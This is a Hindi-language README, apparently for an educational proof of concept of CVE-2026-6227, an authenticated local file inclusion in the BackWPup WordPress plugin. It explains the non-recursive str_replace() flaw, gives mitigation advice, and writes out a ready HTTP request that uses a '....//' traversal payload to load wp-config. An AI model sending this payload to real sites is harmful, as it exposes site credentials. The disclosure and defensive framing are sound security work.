
CVE-2026-6227 के लिए शैक्षिक प्रूफ-ऑफ-कॉन्सेप्ट, जो BackWPup WordPress प्लगइन में एक प्रमाणित Local File Inclusion है, जिसमें root cause analysis, exploit request, और mitigation guidance शामिल है।
BackWPup के 5.6.6 तक के संस्करण /wp-json/backwpup/v1/getblock REST एंडपॉइंट के block_name पैरामीटर के माध्यम से एक प्रमाणित लोकल फाइल इन्क्लूज़न (LFI) भेद्यता से प्रभावित हैं।
यह दोष ट्रैवर्सल अनुक्रमों के गैर-पुनरावर्ती str_replace() सैनिटाइज़ेशन के कारण हुआ था और इसे संस्करण 5.6.7 में पहले ही ठीक कर दिया गया है।
यह रिपॉजिटरी केवल शैक्षिक और नैतिक सुरक्षा अनुसंधान उद्देश्यों के लिए है। यहां दी गई जानकारी प्रशासकों और सुरक्षा टीमों को उनके सिस्टम सत्यापित करने में मदद करने के लिए है। स्पष्ट, लिखित अनुमति के बिना इसे लक्ष्यों के विरुद्ध उपयोग न करें।
BackWPupHelpers::component()POST /wp-json/backwpup/v1/getblockblock_nameकमजोर घटक लोडर include() को आमंत्रित करने से पहले एक गैर-पुनरावर्ती str_replace() सैनिटाइज़ेशन लागू करता है। इसे ....// या ..././ जैसे क्राफ्टेड ट्रैवर्सल पैटर्न का उपयोग करके बायपास किया जा सकता है, जिससे हमलावर-नियंत्रित पथ समाधान की अनुमति मिलती है।
wp-config.php)डिफ़ॉल्ट रूप से, शोषण के लिए व्यवस्थापक-स्तरीय पहुंच की आवश्यकता होती है। यदि बैकअप अनुमतियाँ सौंपी गई हैं, तो कम-विशेषाधिकार वाले उपयोगकर्ता भी इस समस्या का शोषण करने में सक्षम हो सकते हैं।
/wp-json/backwpup/v1/getblock के लिए एक वैध POST अनुरोध का पता लगाएं।block_name को ट्रैवर्सल पेलोड से बदलें।उदाहरण अनुरोध:
POST /wp-json/backwpup/v1/getblock HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-WP-Nonce: <your_nonce_here>
Cookie: wordpress_logged_in_<hash>=<your_session_cookie>
block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
backwpup क्षमता का असाइनमेंट केवल विश्वसनीय भूमिकाओं तक सीमित रखें/wp-json/backwpup/v1/getblock तक संदिग्ध पहुंच के लिए ऑडिट लॉग की समीक्षा करें